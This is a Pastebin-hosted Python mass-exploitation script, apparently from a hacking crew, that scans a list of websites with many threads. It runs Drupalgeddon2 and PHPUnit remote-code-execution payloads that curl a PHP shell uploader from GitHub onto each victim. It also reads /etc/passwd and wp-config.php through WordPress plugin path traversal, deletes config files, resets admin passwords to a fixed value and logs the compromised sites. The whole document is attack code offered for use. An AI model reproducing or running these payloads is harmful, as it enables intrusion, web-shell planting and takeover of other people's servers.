Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib3, requests, os, sys, re, json
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- import base64
- import random
- import string
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- from multiprocessing.dummy import Pool as ThreadPool
- from time import time as timer
- from platform import system
- from colorama import Fore
- from colorama import Style
- from pprint import pprint
- from colorama import init
- import urllib
- from bs4 import BeautifulSoup
- fr = Fore.RED
- fc = Fore.CYAN
- fw = Fore.WHITE
- fg = Fore.GREEN
- sd = Style.DIM
- sn = Style.NORMAL
- sb = Style.BRIGHT
- try:
- os.system('clear')
- print ("""
- ____ ___ ______ _____ ___
- | \ / \ | T| T / _]
- | o )Y Y| |l__/ | / [_
- | T| O |l_j l_j| __jY _]
- | O || | | | | / || [_
- | |l ! | | | || T
- l_____j \___/ l__j l_____jl_____j
- > Dann Kowalskyi ~ Zekkel DeBleau ~ Family Attack Cyber <
- """)
- ganteng = input('ur files => ')
- f= open(ganteng, 'r')
- woh = f.read().splitlines()
- except IOError:
- pass
- woh = list((woh))
- def banner():
- sd
- print ("""
- ____ ___ ______ _____ ___
- | \ / \ | T| T / _]
- | o )Y Y| |l__/ | / [_
- | T| O |l_j l_j| __jY _]
- | O || | | | | / || [_
- | |l ! | | | || T
- l_____j \___/ l__j l_____jl_____j
- > Zekkel AR ~ Family Attack Cyber <
- """)
- def Domains(url):
- if '://' not in url:
- return "http://" + url
- else:
- return url
- def timezone(site):
- try:
- url = Domains(site)
- #cek uname
- command = ('uname -a')
- data1 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data2 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command}
- ambush = requests.post(data1, data=data2, timeout=5).text
- #cek home
- command2 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php')
- data3 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data4 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command2}
- jembit = requests.post(data3, data=data4, timeout=5).text
- kontoool = requests.get(url+'/sayang.php')
- #cek default
- command3 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php')
- data100 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data200 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command3}
- pepek = requests.post(data100, data=data200, timeout=5)
- kontiil = requests.get(url+'/sites/default/files/sayang.php')
- if 'Linux' in ambush:
- print('{}[ {}VULNERABLE {}] {} {}{} [ {}DRUPAL 8 {}] {}[ {}TIMEZONE {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- print(' {}[ {}+ {}] {}Exploiting....' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in kontoool:
- print(' [ + ] Exploit Success {}/sayang.php' .format(url))
- open('drupal_vuln.txt', 'a').write(url+'/sayang.php')
- else:
- print(' {}[ {}+ {}] {}Exploit Failed, Home DIR RED' .format(fc,fr,fc,fr))
- print(' {}[ {}i {}] {}Checking Dir Writable /sites/default/files' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in kontiil:
- print(' [ + ] Success {}/sites/default/files/sayang.php')
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
- else:
- print(' {}[ {}+ {}] {}Exploit Failed ' .format(fc,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- #DRUPALGEDDON MAIL
- def mail(site):
- try:
- url = Domains(site)
- command = ('uname -a')
- url1 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':command}
- ambush2 = requests.post(url1, data=payload, timeout=5).text
- url2 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php'}
- ambuz = requests.post(url2, data=payload2, timeout=5).text
- bla = requests.get(url+'/sayang.php')
- cekdir = url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- hajar = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php'}
- kontill = url+'/sites/default/files/sayang.php'
- if 'Linux' in ambush2:
- print('{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 8 {}] {}[ {}MAIL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
- print(" {} [ {}+ {}] {}Exploiting ... " .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in bla:
- print(" [ + ] Exploit Success ... ")
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print(' {} [ {}+ {}] {}Exploit Failed, Dir RED in home Directory' .format(fc,fr,fc,fg))
- print(" [ + ] CHECKING In dir /sites/default/files")
- if 'Avinash Kumar Thapa' in kontill:
- print(' [ + ] Exploiting Success --> {}/sites/default/files/sayang.php')
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
- else:
- print(' {}[ {}i {}] {}Exploiting Failed, No Writable Dir' .format(fc,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- """
- def drupal7(site):
- url = Domains(site)
- verify = False
- header = headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]': 'uname -a'}
- url2 = (url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax')
- ea = requests.post(url2, data=payload, headers = header, verify=verify, timeout=5).text
- try:
- if 'Linux' in ea:
- print("{}{} --> {} vuln[{}] --> drupal7" .format(fg,url,fc,ea))
- print("[ + ] Exploiting ....")
- kampank = (url)
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print("{}{} --> {} not vuln" .format(fg,url,fr))
- except requests.exceptions.ConnectTimeout:
- print("[ i ] {}{} CONNECTION TIMEOUT" .format(fw,url))
- except Exception as e:
- #print (e)
- print ("{} Something was wrong !" .format(url))
- """
- def upshell(site):
- url = Domains(site)
- print(" [ + ] Exploiting ...")
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sayang.php').text
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
- else:
- print('{} [ + ] Exploiting Failed --> {}{}' .format(fg,fr,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- def writable(site):
- try:
- url = Domains(site)
- print(' {}[ + ] Checking Dir Writable' .format(fg))
- pass
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sites/default/files/sayang.php').text
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
- else:
- print('{} [ + ] Exploiting Failed, No Dir Writable--> {}' .format(fg,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def drupal7_1(site):
- try:
- url = Domains(site)
- kentot = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=uname -a&name[%23type]=markup')
- data = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- r = requests.post(kentot,data = data,verify = False,timeout = 5)
- result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
- if result:
- found = result.group(1)
- url2= url + '?q=file/ajax/name/%23value/'+found
- data = {'form_build_id' : found}
- r = requests.post(url2,data = data,verify = False,timeout = 5).text
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sites/default/files/sayang.php').text
- else:
- pass
- kentot3 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
- data7 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re3 = requests.post(kentot3,data = data7,verify = False,timeout = 5)
- result3 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re3.text)
- if result3:
- found4 = result3.group(1)
- url234 = url+'?q=file/ajax/name/%23value/'+found4
- data2 = {'form_build_id' : found4}
- babi = requests.post(url234, data=data2, verify = False, timeout=5)
- cek1 = requests.get(url+'/sayang.php').text
- else:
- pass
- if 'Linux' in r:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 7 {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- print(" {} [ {}+ {}] {}Exploiting" .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sites/default/files/sayang.php" .format(fg,url))
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php'+"\n")
- else:
- print('{} [ {}+ {}] {}Exploiting Failed, {}[ {}NO DIR WRITABLE {}]' .format(fc,fr,fc,fc,fc,fr,fc))
- print("{} [ i ] Checking in Home Directory.." .format(fg))
- if 'Avinash Kumar Thapa' in cek1:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fc, url))
- open('drupal_vuln.txt', 'a').write(url+'/sayang.php'+"\n")
- else:
- print("{} [ + ] Exploit Failed DIR RED " .format(fr))
- open('drupal_vuln.txt', 'a').write(url+"\n")
- # upshell(url)
- #writable(url)
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- #print("{}[ i ] {}{} --> URL ERROR" .format(fw,fw,url))
- def enum(site):
- try:
- url = Domains(site)
- for i in range(5):
- enum = urllib.parse.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
- data = requests.post(url + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False, timeout=3)
- login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
- for user in login:
- return user
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def wp_spritz(site):
- try:
- url = Domains(site)
- exploit = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd"
- blank = requests.get(url+exploit, timeout=5)
- if blank.status_code == 200:
- print ("[ + ] STATUS CODE 200OK... EXPLOITING")
- if 'root:x:0:0:root:/root:/bin/bash' in blank.text:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP SPRITZ {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('wp_spritz', 'a').write(url + exploit + "\n")
- else:
- print ("{}[ + ] EXPLOITING FAILED" .format(fc))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def ad_manager(site):
- try:
- url = Domains(site)
- exploit = '/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php'
- blank = requests.get(url+exploit, timeout=5).text
- if 'DB_NAME' in blank:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}AD MANAGER {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('ad_manager.txt', 'a').write(url + exploit + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def backup(site):
- try:
- url = Domains(site)
- exploit = '/wp-content/themes/CherryFramework/admin/data_management/download_backup.php '
- blank = requests.get(url+exploit, stream=True)
- if blank.status_code == 200:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}BACKUP {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- tai = input('name file => ')
- print ("{}{} Downloading File...." .format(url))
- with open(tai + '.mp3','wb') as f:
- for i in r.iter_content(1024):
- if i:
- f.write(i)
- f.flush
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def wp_reset(site):
- try:
- url = Domains(site)
- login = enum(site)
- pw = "rdcl@hxr000"
- reset = urllib.parse.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
- data = requests.post(url + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False, timeout=3)
- res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
- for i in res:
- if i == str('icon-checkmark6') and data.status_code == 200:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP RESET {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('reset_success.txt', 'a').write(url + "|" + login + "|" + pw + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def Arforms_config(site):
- try:
- url = Domains(site)
- payload = {
- "action":"arf_delete_file",
- "file_name":"../../../../wp-config.php"
- }
- r = requests.post(url + "/wp-admin/admin-ajax.php", data=payload, headers=headers, timeout=3)
- sh = requests.get(url + "/wp-admin").text
- if 'id="setup" method="post" action="?step=0' in sh:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}ARFORMS CONFIG {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('arforms_del.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def wp_install(site):
- try:
- url = Domains(site)
- list_path = ['/','/new', '/wp', '/wordpress']
- for path in list_path:
- check = requests.get(url + path + "/wp-admin/setup-config.php" ,headers=headers, timeout=3).text
- if '<a href="setup-config.php?step=1' in check:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP INSTALL{}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('wp_install.txt', 'a').write(url + path + "/wp-admin/setup-config.php" + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def phpunit(site):
- try:
- url = Domains(site)
- op = url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
- cekos = "<?php system('uname -a');?>"
- upshell = '<?php system("curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o muach.php"); ?>'
- b = requests.post(op, data=cekos, timeout=5).text
- t = url+'/vendor/phpunit/phpunit/src/Util/PHP/muach.php'
- da=requests.post(url, data=upshell, timeout=5)
- bbb = requests.get(t).text
- if 'Linux' in b:
- print('{}[ {}VULNERABLE {}]{} {} {}[ {}LARAVEL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr))
- print(' {}[ {}+ {}] {}Exploiting...' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in bbb:
- print('{}[{}+{}]{}{} [ {}SUCCESS {}]{}[{}LARAVEL{}]' .format(fr,fc,fr,fg,url,fc,fg,fc,fg,fc))
- open('php_unit.txt', 'a').write(url + "\n")
- else:
- print('{} [ {}- {}] {}Exploit Failed' .format(fc,fr,fc,fr))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- def wordpress_cubed(site):
- url = Domains(site)
- def Run_Work(site):
- url = Domains(site)
- drupal7_1(url)
- phpunit(url)
- mail(url)
- timezone(url)
- wp_spritz(url)
- ad_manager(url)
- backup(url)
- wp_reset(url)
- Arforms_config(url)
- wp_install(url)
- os.system('clear')
- def Main():
- start = timer()
- pp = ThreadPool(40)
- pr = pp.map(Run_Work, woh)
- print('Time: ' + str(timer() - start) + ' seconds')
- if __name__ == "__main__":
- Main()
- """
- if 'Linux' in ambush:
- print("{} --> vuln" .format(kontil))
- else:
- print("{} --> Not Vuln" .format(kontil))
- """
Add Comment
Please, Sign In to add comment